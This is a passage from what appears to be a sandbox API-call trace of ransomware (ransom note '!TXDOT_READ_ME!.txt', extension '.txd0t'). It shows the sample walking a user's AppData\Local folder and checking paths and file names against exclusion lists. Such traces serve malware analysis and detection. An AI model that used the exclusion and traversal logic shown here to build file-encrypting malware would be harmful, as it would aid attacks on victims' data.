(psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.013] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa96a60b1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4462fde, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa96a60b1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0090.013] StrCmpW (psz1="ActiveSync", psz2=".") returned 1 [0090.013] StrCmpW (psz1="ActiveSync", psz2="..") returned 1 [0090.013] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.013] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.013] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="ActiveSync", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync") returned="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync" [0090.013] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\system32\\") returned 0x0 [0090.013] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.013] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\system\\") returned 0x0 [0090.013] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.013] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.013] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\ActiveSync" [0090.013] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x76e74ef1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0090.013] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0090.013] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0090.013] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.013] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.013] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Adobe", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe" [0090.015] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0090.015] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.015] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0090.015] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.015] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.015] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Adobe" [0090.016] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0090.016] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0090.016] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0090.016] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6a9d454, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CEF", cAlternateFileName="")) returned 1 [0090.016] StrCmpW (psz1="CEF", psz2=".") returned 1 [0090.016] StrCmpW (psz1="CEF", psz2="..") returned 1 [0090.016] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.016] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.016] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="CEF", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\CEF") returned="C:\\Users\\FD1HVy\\AppData\\Local\\CEF" [0090.016] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\system32\\") returned 0x0 [0090.016] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.016] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\system\\") returned 0x0 [0090.016] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.016] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.016] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\CEF" [0090.016] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46a165bd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc46ec579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x476c0de7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0090.016] StrCmpW (psz1="Comms", psz2=".") returned 1 [0090.016] StrCmpW (psz1="Comms", psz2="..") returned 1 [0090.016] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.016] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.016] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Comms", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Comms") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Comms" [0090.016] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\system32\\") returned 0x0 [0090.016] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.016] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\system\\") returned 0x0 [0090.016] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.016] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.016] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Comms" [0090.016] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc58b9bba, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc58b9bba, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc58b9bba, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ConnectedDevicesPlatform", cAlternateFileName="CONNEC~1")) returned 1 [0090.016] StrCmpW (psz1="ConnectedDevicesPlatform", psz2=".") returned 1 [0090.016] StrCmpW (psz1="ConnectedDevicesPlatform", psz2="..") returned 1 [0090.016] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.016] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.016] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="ConnectedDevicesPlatform", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform") returned="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform" [0090.017] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpSrch="\\windows\\system32\\") returned 0x0 [0090.017] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.017] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpSrch="\\windows\\system\\") returned 0x0 [0090.017] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.017] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.017] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\ConnectedDevicesPlatform" [0090.017] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xadb6a93, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4a3bd622, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x7e3bdb64, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0090.017] StrCmpW (psz1="Google", psz2=".") returned 1 [0090.017] StrCmpW (psz1="Google", psz2="..") returned 1 [0090.017] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.017] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.017] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Google", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Google") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Google" [0090.017] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpSrch="\\windows\\system32\\") returned 0x0 [0090.017] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.017] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpSrch="\\windows\\system\\") returned 0x0 [0090.017] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.017] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.017] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Google" [0090.017] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0090.017] StrCmpW (psz1="History", psz2=".") returned 1 [0090.017] StrCmpW (psz1="History", psz2="..") returned 1 [0090.017] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd2e85042, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x13441, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0090.017] StrCmpW (psz1="IconCache.db", psz2=".") returned 1 [0090.017] StrCmpW (psz1="IconCache.db", psz2="..") returned 1 [0090.017] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.017] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.017] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="IconCache.db", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db") returned="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db" [0090.017] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0090.017] StrCmpW (psz1=".db", psz2=".txd0t") returned -1 [0090.017] StrCmpIW (psz1="IconCache.db", psz2="bootsect.bak") returned 1 [0090.017] StrCmpIW (psz1="IconCache.db", psz2="iconcache.db") returned 0 [0090.017] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0090.017] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0090.018] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0090.018] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.018] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.018] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Microsoft", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft" [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system32\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Microsoft" [0090.018] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a9a8d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc895324f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd6772beb, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0090.018] StrCmpW (psz1="MicrosoftEdge", psz2=".") returned 1 [0090.018] StrCmpW (psz1="MicrosoftEdge", psz2="..") returned 1 [0090.018] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.018] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.018] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="MicrosoftEdge", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge") returned="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge" [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpSrch="\\windows\\system32\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpSrch="\\windows\\system\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\MicrosoftEdge" [0090.018] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9067e6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfa9067e6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x190eac40, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0090.018] StrCmpW (psz1="Mozilla", psz2=".") returned 1 [0090.018] StrCmpW (psz1="Mozilla", psz2="..") returned 1 [0090.018] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.018] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.018] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Mozilla", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla" [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpSrch="\\windows\\system32\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpSrch="\\windows\\system\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.018] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Mozilla" [0090.019] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfe87ff8e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfe87ff8e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0090.019] StrCmpW (psz1="Packages", psz2=".") returned 1 [0090.019] StrCmpW (psz1="Packages", psz2="..") returned 1 [0090.019] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.019] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.019] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Packages", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages" [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpSrch="\\windows\\system32\\") returned 0x0 [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpSrch="\\windows\\system\\") returned 0x0 [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Packages" [0090.019] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdf9e1b08, ftLastWriteTime.dwHighDateTime=0x1d32734, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0090.019] StrCmpW (psz1="PeerDistRepub", psz2=".") returned 1 [0090.019] StrCmpW (psz1="PeerDistRepub", psz2="..") returned 1 [0090.019] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.019] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.019] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="PeerDistRepub", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub") returned="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub" [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpSrch="\\windows\\system32\\") returned 0x0 [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpSrch="\\windows\\system\\") returned 0x0 [0090.019] 